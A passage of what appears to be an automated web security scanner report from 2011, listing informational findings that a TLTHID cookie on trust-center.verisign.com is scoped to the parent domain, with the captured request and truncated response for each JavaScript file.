JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 741 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user...[SNIP]...
9.59. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/chat_support.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/chat_support.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 423 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height...[SNIP]...
9.60. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/default.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/default.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2794 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();} function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d...[SNIP]...
9.61. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/oo_conf_en-US_inline.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:36 GMT Server: ApacheSet-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1674 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ /* Create new OnlineOpini...[SNIP]...
9.62. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/oo_engine_c.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 28368 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var OnlineOpinion=new Ob...[SNIP]...
9.63. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/popup.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/popup.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 598 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(...[SNIP]...
9.64. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/product_white_list.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1005 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ...[SNIP]...
9.65. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/quick_signin.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 5155 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle...[SNIP]...
9.66. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/script_log.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/script_log.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1408 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}} function generateCall(level,message){var url='...[SNIP]...
9.67. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/src/dojo/dojo/dojo.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:25 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 89269 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved. Available via Academic Free License >= 2.1 OR the modified BSD license. see: http://dojotoolkit.org/license for details */ /* ...[SNIP]...
9.68. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/syscheck.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/syscheck.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:33 GMT Server: ApacheSet-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1470 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}} function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o...[SNIP]...
9.69. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/tealeaf/TealeafSDK.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 57905 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi...[SNIP]...
9.70. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
